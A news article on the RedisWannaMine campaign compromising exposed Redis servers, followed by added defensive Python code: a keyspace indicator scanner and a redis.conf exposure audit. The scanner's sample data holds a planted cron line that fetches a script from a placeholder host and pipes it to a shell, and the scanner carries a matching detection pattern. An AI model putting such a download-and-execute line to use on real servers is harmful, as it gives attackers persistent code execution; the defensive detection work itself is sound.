75% of Vulnerable Redis Servers Discovered to Be Compromised

Surge in Attacks Targeting Open Redis Servers

Recent developments in cybersecurity have revealed a significant threat to organizations utilizing open Redis servers. Nearly two months after researchers issued warnings, a malware campaign specifically targeting these servers has escalated alarmingly, compromising at least 75% of publicly accessible Redis instances.

Redis, short for REmote DIctionary Server, is a well-known open-source data structure store widely used as an in-memory database, message broker, and cache. A key weakness stems from its design assumptions: Redis is meant to be reached only by trusted clients inside a trusted network, not exposed directly on the internet.

The malware, referred to as RedisWannaMine, initially came to light in late March when the data center security vendor Imperva reported that it could deploy a cryptocurrency mining script on targeted servers, impacting both database and application layers. The firm characterized this cryptojacking threat as unusually sophisticated, employing evasion techniques and worm-like behavior to maximize infection rates.

According to a recent report by Imperva, a staggering three-quarters of open Redis servers available over the internet via port 6379 contain malicious key-value pairs in memory. This revelation underscores ongoing difficulties faced by administrators in securing their systems, despite repeated warnings regarding these vulnerabilities. Data collected by Imperva’s honeypot servers indicates that 68% of compromised systems used keys labeled “backup1, backup2, backup3,” with a significant portion of attacks originating from a medium-sized botnet predominantly located in China.

The malicious actors behind these attacks are using compromised Redis servers as proxies to scan other websites for further vulnerabilities. Techniques employed include SQL injection, cross-site scripting, malicious file uploads, and remote code execution. The attack itself works by setting a harmful key-value pair in memory and then persisting it as a file in the /etc/crontabs directory, so that the scheduler executes the embedded commands without the server owner's consent.

Nadav Avital, the security research team leader at Imperva, explains that attackers typically plant values that contain commands to download external resources, which can facilitate further access. Another common tactic involves inserting SSH keys to secure remote access to the compromised machines.
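The indicators described above (the `backup1`–`backup3` key names, cron entries that fetch and run an external script, and planted SSH public keys) can be checked for directly in a dump of a server's keyspace. The following is an added detection example, not code from Imperva or the Redis project; the key-name set and regular expressions are my own approximation of the indicators the article names, and the sample keyspace, including the `example.invalid` URL and the SSH key material, is constructed for illustration.

```python
"""Scan Redis key/value pairs for the RedisWannaMine-style indicators named in the article."""
import re
from typing import Dict, List

# Key names Imperva's honeypot data associated with the campaign.
SUSPECT_KEYS = {"backup1", "backup2", "backup3"}

# A cron schedule (five fields) followed by a download piped into a shell.
# Values planted in Redis and persisted into /etc/crontabs take this shape.
CRON_DOWNLOAD_RE = re.compile(
    r"^\s*(?:[\d*/,-]+\s+){5}.*\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b",
    re.MULTILINE,
)

# An SSH public key written through Redis to gain persistent remote access.
SSH_KEY_RE = re.compile(r"\bssh-(?:rsa|ed25519|dss)\s+[A-Za-z0-9+/=]{20,}")


def inspect_pair(key: str, value: str) -> List[str]:
    """Return indicator labels for one key/value pair; an empty list means clean."""
    findings: List[str] = []
    if key in SUSPECT_KEYS:
        findings.append("suspect-key-name")
    if CRON_DOWNLOAD_RE.search(value):
        findings.append("cron-download-exec")
    if SSH_KEY_RE.search(value):
        findings.append("ssh-public-key")
    return findings


def scan_keyspace(pairs: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a key -> value mapping and keep only entries that raised at least one indicator."""
    flagged: Dict[str, List[str]] = {}
    for key, value in pairs.items():
        labels = inspect_pair(key, value)
        if labels:
            flagged[key] = labels
    return flagged


# Constructed sample keyspace: one legitimate cache entry beside two planted values.
# The URL and key material are placeholders, not real indicators.
SAMPLE_KEYSPACE = {
    "session:4f2a": '{"user": "alice", "ttl": 3600}',
    "backup1": "\n\n*/1 * * * * curl -fsSL http://example.invalid/x.sh | sh\n\n",
    "backup2": "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDconstructedsamplekey0000 root@example\n\n",
}

if __name__ == "__main__":
    for key, labels in scan_keyspace(SAMPLE_KEYSPACE).items():
        print(f"{key}: {', '.join(labels)}")
```

In practice the mapping would be built from `KEYS`/`SCAN` and `GET` output taken during triage; the padding newlines in the sample values are deliberate, since attackers wrap planted content that way so it survives being written out as a cron or `authorized_keys` file.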

To mitigate risks, administrators are strongly advised to restrict internet exposure for their Redis servers. When it is necessary to enable external access, implementing robust authentication mechanisms is crucial to prevent unauthorized infiltration. Additionally, due to Redis’s lack of encryption and the plaintext storage of its data, sensitive information should never be stored on these servers.
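The exposure settings behind that advice live in `redis.conf`: `bind` (which interfaces the server listens on), `protected-mode` (refuses remote clients when no password is set) and `requirepass`. Below is an added example of an audit for those three directives, written for this page rather than taken from Redis or Imperva; the weak and hardened configuration texts are constructed, and the password value is a placeholder.

```python
"""Audit redis.conf for the exposure settings the mitigation advice concerns."""
from typing import Dict, List

WILDCARD_ADDRESSES = {"0.0.0.0", "*", "::"}


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Parse redis.conf text into directive -> list of argument strings.

    Blank lines and comments are skipped; directives that appear more than
    once are kept in order so the caller can apply last-wins semantics.
    """
    directives: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, args = line.partition(" ")
        directives.setdefault(name.lower(), []).append(args.strip())
    return directives


def audit_exposure(conf: Dict[str, List[str]]) -> List[str]:
    """Return human-readable findings for settings that expose the instance."""
    findings: List[str] = []

    # No bind directive means Redis listens on every interface, as does a wildcard.
    binds = conf.get("bind", [])
    tokens = {tok for b in binds for tok in b.split()}
    if not binds or tokens & WILDCARD_ADDRESSES:
        findings.append("bind: listens on all interfaces (missing or wildcard address)")

    # protected-mode defaults to yes; an explicit 'no' removes the remote-client guard.
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode: disabled")

    # Without requirepass any client that can reach the port has full access.
    if not any(arg for arg in conf.get("requirepass", [])):
        findings.append("requirepass: no password configured")

    return findings


# Constructed configuration fragments: the exposed setup the article warns about,
# and the same instance restricted to the local host with authentication enabled.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE-ME-long-random-secret
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_exposure(parse_redis_conf(text))
        print(f"{label}: {findings if findings else 'no exposure findings'}")
```

Binding to a private address and adding a password addresses reachability and authentication only; as the paragraph notes, data in Redis is still held and transmitted in the clear, so the audit passing does not make the store suitable for sensitive information.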

Avital emphasizes the frequent security lapses that occur when organizations fail to read proper documentation, particularly when migrating services to the cloud. Such oversights can lead to vulnerabilities that malicious actors readily exploit.

As businesses increasingly adopt cloud-based services, understanding and implementing effective security practices is paramount. Organizations must remain vigilant in safeguarding their systems from persistent threats, ensuring that they are not only aware but also prepared to defend against evolving cyberattack methodologies.
